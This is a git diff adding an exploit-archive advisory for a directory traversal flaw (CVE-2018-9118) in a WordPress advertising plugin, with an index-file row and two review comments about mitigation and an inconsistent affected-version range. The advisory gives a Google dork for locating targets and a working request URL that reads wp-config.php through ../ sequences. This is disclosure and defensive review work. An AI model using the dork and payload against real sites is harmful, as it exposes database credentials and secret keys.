diff --git a/exploits/php/webapps/44417.txt b/exploits/php/webapps/44417.txt
new file mode 100644
index 000000000..0ec8d9826
--- /dev/null
+++ b/exploits/php/webapps/44417.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
+# Google Dork: inurl:/plugins/wpsite-background-takeover
+# Date: 2018-03-08
+# Exploit Author: Colette Chamberland, Defiant, Inc.
+# Vendor Homepage: https://99robots.com
+# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
+# Version: <= 4.1.4
+# Tested on: Wordpress 4.9.x
+# CVE : CVE-2018-9118
+
+Description
+
+Allows for an attacker to browse files via the download.php file:
+
+http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6487d1450..217983d5c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39151,6 +39151,7 @@ id,file,description,date,author,type,platform,port
 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
+44417,exploits/php/webapps/44417.txt,"Wordpress Background Takeover < 4.1.4 - Directory Traversal",2018-04-09,"Colette Chamberland",webapps,php,
 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
 44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,
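Review bot: The advisory body in 44417.txt ends at the request example and never states a fixed release or whether download.php requires an authenticated session, so a reader cannot tell which installs remain exposed. I would add a header line such as `# Fixed in: <patched version, not stated on this page>` and a closing line such as `Mitigation: update the plugin; until then block or alert on requests to exports/download.php whose filename parameter contains ../`. Since the example path reads wp-config.php, the entry should also say that database credentials and authentication salts need rotating if such requests show up in access logs.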
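Review bot: The description in the added files_exploits.csv row gives the affected range as `< 4.1.4`, while the header of 44417.txt in this same commit says `<= 4.1.4` in both the title and the Version field. Anyone matching plugin inventories against the CSV would treat 4.1.4 as unaffected. Assuming the advisory header is the authoritative one, the field should read `"Wordpress Background Takeover <= 4.1.4 - Directory Traversal"`.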